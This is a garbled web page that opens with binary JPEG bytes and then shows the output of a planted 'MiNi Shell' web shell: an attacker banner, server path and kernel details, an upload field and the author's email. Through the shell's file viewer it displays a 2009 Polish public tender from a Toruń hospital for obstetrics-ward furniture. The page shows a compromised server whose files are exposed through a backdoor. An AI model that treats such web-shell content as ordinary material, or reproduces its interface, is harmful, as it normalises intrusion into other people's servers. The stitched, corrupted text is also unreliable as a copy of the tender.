JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090710/233616-N-2009.html

<p class="kh_header"><b>Toruń: Dostawa i montaż mebli medycznych i biurowych dla Oddziału Położnictwa.</b><br>
<b>Numer ogłoszenia: 233616 - 2009; data zamieszczenia: 10.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli medycznych i biurowych dla Oddziału Położnictwa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli medycznych i biurowych dla Oddziału Położnictwa, tj.:
1. Pokój badań lekarskich (meble medyczne):
1.1 Szafka wisząca 2-komorowa z drzwiami i półkami, 130 x 30 x 60	 (cm) - 2 szt.;
1.2 Szafka stojąca 2-komorowa z drzwiami i 4-ma szufladami, 110 x 60 x 85 (cm) - 1 szt.;
1.3 Szafka stojąca dwudrzwiowa z półką, 110 x 60 x 85 (cm) - 1 szt.;
1.4 Szafka stojąca 2-komorowa z drzwiami i 4-ma szufladami, 110 x 56 x 85 (cm) - 1 szt.;
1.5 Biurko lekarskie z 4-ma szufladami, półką pod klawiaturę i podstawą pod komputer, 120 x 60 x 75 (cm) - 1 szt.;
1.6 Krzesło obrotowe do biurka, z podłokietnikami, tapicerowane materiałem zmywalnym - 1 szt.;
1.7 Taboret obrotowy z siedziskiem tapicerowanym materiałem zmywalnym - 1 szt.;
1.8 Krzesło na stelażu metalowym chromowanym z siedziskiem i oparciem tapicerowanym i podłokietnikami - 3 szt.
2. Pracownia USG (meble medyczne):
2.1 Biurko lekarskie z 4-ma szufladami, półką pod klawiaturę i podstawą pod komputer, 120 x 60 x 75 (cm) - 1 szt.;
2.2 Szafka wisząca 2-komorowa z drzwiami i półkami, 130 x 30 x 60 (cm) - 1 szt.;
2.3 Krzesło obrotowe do biurka, z podłokietnikami, tapicerowane materiałem zmywalnym - 1 szt.;
2.4 Krzesło na stelażu metalowym chromowanym z siedziskiem i oparciem tapicerowanym i podłokietnikami - 2 szt.
3. Sekretariat (meble socjalne):
3.1 Szafa stojąca wnękowa, 2-komorowa, dwudrzwiowa z półkami na dokumenty, 122 x 58 x 180 (cm) - 1 szt.;
3.2 Szafa stojąca dzielona poziomo z drzwiami i półkami na dokumenty, 90 x 55 x 200 (cm) - 1 szt.;
3.3 Stolik na nogach chromowanych, 126 x 60 x 75 (cm) - 1 szt.;
3.4 Biurko z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 140 x 60 x 75 (cm) - 2 szt.;
3.5 Krzesło obrotowe do biurka, z podłokietnikami, tapicerowane materiałem zmywalnym - 2 szt.;
3.6 Krzesło na stelażu metalowym chromowanym z siedziskiem i oparciem tapicerowanym i podłokietnikami - 2 szt.
4. Brudownik ( meble ze stali nierdzewnej kwasoodpornej):
4.1 Szafka wisząca ze stali nierdzewnej, dwudrzwiowa z półką, 100 x 35 x 70	 (cm) - 1 szt.;
4.2 Szafka stojąca ze stali nierdzewnej, dwudrzwiowa z półką, 100 x 60 x 85 (cm) - 1 szt.;
4.3 Regał ze stali nierdzewnej na baseny, 100 x 40 x 200 (cm) - 1 szt.
5. Pokój położnej oddziałowej (meble socjalne):
5.1 Biurko z 4-ma szufladami, podstawą pod komputer i półką pod klawiaturę, 130 x 60 x 75 (cm) - 1 szt.;
5.2 Szafa stojąca dzielona poziomo z drzwiami i półkami na dokumenty, zamykana na zamek, 90 x 50 x 200 (cm) - 1 szt.;
5.3 Szafa stojąca dwudrzwiowa z półkami na dokumenty, zamykana na zamek, 90 x 50 x 200 (cm) - 2 szt.;
5.4 Regał otwarty z półkami na dokumenty, 90 x 50 x 200 (cm) - 1 szt.;
5.5 Ława okolicznościowa, 80 x 55 x 63 (cm) - 1 szt.;
5.6 Fotel wypoczynkowy - 2 szt.;
5.7 Krzesło obrotowe do biurka, z podłokietnikami, tapicerowane materiałem zmywalnym - 1 szt.;
5.8 Krzesło na stelażu metalowym chromowanym z siedziskiem i oparciem tapicerowanym i podłokietnikami - 1 szt.;
5.9 Regał 2-półkowy nad biurko, 130 x 30 x 45 (cm) - 1 szt.
6. Magazynek (meble socjalne):
6.1 Szafa stojąca dwudrzwiowa z półkami, 80 x 60 x 220 (cm) - 1 szt.;
6.2 Szafa stojąca jednodrzwiowa, przystosowana do zabudowy narożnika z półkami, 115 x 60 x 220 (cm) - 1 szt.;
6.3 Szafa stojąca dzielona poziomo z drzwiami i półkami, 100 x 55 x 220 (cm) - 2 szt.;
6.4 Szafa stojąca dwudrzwiowa z półkami, 90 x 55 x 220 (cm) - 2 szt.
7. Pomieszczenie wydawcze (meble medyczne):
7.1 Szafka wisząca dwudrzwiowa z półką, 85 x 35 x 70 (cm) - 2 szt.;
7.2 Szafka stojąca dwudrzwiowa z półką, 110 x 60 x 85 (cm) - 1 szt.
8. Punkt położnych (meble medyczne):
8.1 Szafka stojąca dwudrzwiowa pod zlewozmywak (zlew inwestora), 79 x 46 x 82 (cm) - 1 szt.;
8.2 Szafka wisząca dwudrzwiowa z półką, 80 x 30 x 60 (cm) - 4 szt.;
8.3 Szafka stojąca dwudrzwiowa z półką, 80 x 60 x 85 (cm) - 2 szt.;
8.4 Szafka stojąca 2-komorowa z 8-ma szufladami, 80 x 60 x 85 (cm) - 2 szt.;
8.5 Biurko lekarskie z 4-ma szufladami, półką pod klawiaturę i podstawą pod komputer, 130 x 60 x 75 (cm) - 1 szt.;
8.6 Krzesło obrotowe do biurka, z podłokietnikami, tapicerowane materiałem zmywalnym - 1 szt.
9. Pokój socjalny (meble socjalne):
9.1 Szafka stojąca dwudrzwiowa z półką, 80 x 45 x 85 (cm) - 1 szt.;
9.2 Szafka wisząca dwudrzwiowa z półką, 80 x 30 x 60 (cm) - 2 szt.;
9.3 Ława okolicznościowa, 80 x 55 x 63 (cm) - 1 szt.;
9.4 Tapczan, 200 x 80 (cm) - 1 szt.;
9.5 Fotel wypoczynkowy - 1 szt.
10. Pomieszczenie porządkowe (meble medyczne):
10.1 Szafka wisząca dwudrzwiowa z półką, 85 x 35 x 60 (cm) - 2 szt.;
10.2 Szafka stojąca dwudrzwiowa z półką, 85 x 50 x 85 (cm) - 1 szt.
11. Sala pacjentek (meble medyczne):
11.1 Szafa stojąca dzielona poziomo z drzwiami i półkami, zamykana na zamki, 75 x 55 x 200 (cm) - 1 szt.;
11.2 Szafka stojąca jednodrzwiowa z półką, 55 x 45 x 85 (cm) - 1 szt.;
11.3 Wózek zabiegowy - metalowy, malowany proszkowo z 5-ma szufladami z wyciąganymi wkładami z tworzywa i blatem roboczym z podniesionymi burtami z 3-stron, 60 x 57 x 89 (cm) - 1 szt.
12. Pokój lekarzy 1 (meble socjalne):
12.1 Biurko z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 130 x 70 x 75 (cm) - 2 szt.;
12.2 Dostawka półokrągła do biurka, 140 x 50 x 75 (cm) - 1 szt.;
12.3 Tapczan - narożnik, 160/140 (cm) - 1 szt.;
12.4 Regał otwarty z półkami na dokumenty, 45 x 33 x 200 (cm) - 1 szt.;
12.5 Szafa dwudrzwiowa z półkami na dokumenty, 80 x 45 x 200 (cm) - 1 szt.;
12.6 Ława okolicznościowa z półką - 80 x 55 x 63 (cm) - 1 szt.;
12.7 Krzesło obrotowe do biurka, z podłokietnikami, tapicerowane materiałem zmywalnym - 2 szt.;
12.8 Krzesło na stelażu metalowym chromowanym z siedziskiem i oparciem tapicerowanym i podłokietnikami - 2 szt.
13. Pokój lekarzy 2 (meble socjalne):
13.1 Biurko z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 130 x 60 x 75 (cm) - 2 szt.;
13.2 Dostawka półokrągła do biurka, 30 x 60 x 75 (cm) - 1 szt.;
13.3 Regał otwarty z półkami na dokumenty, 45 x 45 x 200 (cm) - 1 szt.;
13.4 Szafka stojąca dwudrzwiowa z półką i nadstawką z wbudowaną szafką dwudrzwiową, 70 x 60 x 200 (cm) - 1 szt.;
13.5 Tapczan 200 x 80 (cm) - 1 szt.;
13.6 Ława okolicznościowa z półką, 80 x 55 x 63 (cm) - 1 szt.;
13.7 Krzesło obrotowe do biurka, z podłokietnikami, tapicerowane materiałem zmywalnym - 2 szt.;
13.8 Krzesło na stelażu metalowym chromowanym z siedziskiem i oparciem tapicerowanym i podłokietnikami - 2 szt.;
14. Korytarz (meble socjalne):
14.1 Stolik na stelażu metalowym, 80 x 60 x 72 (cm) - 2 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2, 39.13.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy potwierdzą spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy - Prawo zamówień publicznych oraz dołączą do oferty wymienione poniżej dokumenty i oświadczenia. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów, oświadczeń zgodnie z formułą /spełnia/- /nie spełnia/. Z treści załączonych do oferty dokumentów i oświadczeń musi wynikać jednoznacznie, że warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. należy załączyć w ofercie:
a/ Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Zamawiający dopuszcza możliwość złożenia czytelnej kserokopii wpisu do działalności gospodarczej wystawionej w okresie wcześniejszym, ale potwierdzonej za zgodność z oryginałem przez organ wydający w/w dokument w wymaganym terminie pod kątem aktualności stanu faktycznego z zapisami w w/w dokumencie.         
b/ Oświadczenie o nie wykluczeniu na podstawie art. 24 oraz spełnieniu warunków zawartych w art. 22 ust. 1 Prawa zamówień publicznych wg Załączników Nr 5 i Nr 6 sporządzonych przez Zamawiającego do niniejszej SIWZ.
2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty następujące dokumenty:
a/ wykaz wykonanych min. 2 dostaw mebli medycznych o wartości min. 50.000 zł brutto każda dostawa w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;
3. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, należy załączyć następujący dokument:
a/ informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do minimalnej kwoty 50.000,00 zł wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.
4. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca musi załączyć do oferty: 
a) atest higieniczny i certyfikat na oferowane meble dopuszczający je do eksploatacji w pomieszczeniach medycznych dla mebli wykonanych ze stali nierdzewnej kwasoodpornej i świadectwa dopuszczające do eksploatacji w pomieszczeniach użyteczności publicznej dla mebli wykonanych z płyty wiórowej laminowanej.
b) certyfikat dla elementów drewnopodobnych potwierdzający spełnianie normy E-1.
c) katalogi/prospekty, zdjęcia wykonanych przez Wykonawcę mebli medycznych ze stali nierdzewnej kwasoodpornej oraz mebli z płyty wiórowej laminowanej.
5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu na składanie ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej należy je zastąpić dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym Wykonawca ma siedzibę lub miejsca zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych- pokój nr 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2009 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com